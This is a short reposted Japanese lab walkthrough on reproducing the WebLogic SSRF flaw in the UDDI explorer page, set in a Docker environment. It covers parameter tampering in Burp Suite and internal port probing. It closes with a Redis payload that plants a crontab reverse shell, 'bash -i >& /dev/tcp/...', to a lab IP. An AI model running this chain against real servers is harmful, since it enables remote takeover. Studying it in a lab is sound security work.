ホームページ >運用・保守 >安全性 >Weblogic SSRF の脆弱性を再現する方法

Weblogic SSRF の脆弱性を再現する方法

王林
王林転載
2023-05-14 20:04:041399ブラウズ

1. docker を使用して環境を構築する

Docker のインストールと環境構築のチュートリアル: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

#アクセス ポート 7001如何实现Weblogic SSRF漏洞复现

2. 脆弱性の再現手順

1. 脆弱性ページ/uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2. IBM を確認します。

如何实现Weblogic SSRF漏洞复现

接続があることが判明したため、ssrf がある可能性があります。

3. burp suite を使用してキャプチャします

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

#4. オペレータ パラメータの接続を変更します

如何实现Weblogic SSRF漏洞复现## 5. アクセス結果

#存在しないポートにアクセスすると、HTTP 経由で接続できませんでした。

#既存のポートにアクセスすると、ステータス コードが返されます如何实现Weblogic SSRF漏洞复现

イントラネットにアクセスする如何实现Weblogic SSRF漏洞复现

redis を使用してシェル ペイロードをリバウンドする如何实现Weblogic SSRF漏洞复现

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

以上がWeblogic SSRF の脆弱性を再現する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明:
この記事はyisu.comで複製されています。侵害がある場合は、admin@php.cn までご連絡ください。